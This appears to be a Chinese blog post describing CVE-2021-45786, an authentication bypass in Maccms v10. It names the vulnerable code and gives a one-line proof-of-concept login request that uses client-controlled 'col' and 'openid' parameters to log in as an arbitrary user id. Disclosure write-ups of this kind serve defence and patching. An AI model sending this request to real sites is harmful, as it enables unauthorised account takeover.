CVE-2021-45786:maccms任意用户登录

简介

在Maccms v10中,攻击者可以通过向/index.php/user/login发送“col”和“openid”参数实现越权登陆。

受影响版本

名称 版本 语言 更新
Maccms 10.0 PHP *

漏洞分析

\application\common\model\user.php中的320行“col”和“openid”参数客户端可控。(可实现登录任意id用户)

漏洞复现

POC


POST /index.php/user/login

col=user_id&openid=2

posted @   徐野子  阅读(369)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
历史上的今天:
2020-07-09 Windows桌面图标(任务栏)异常的解决方案
点击右上角即可分享
微信分享提示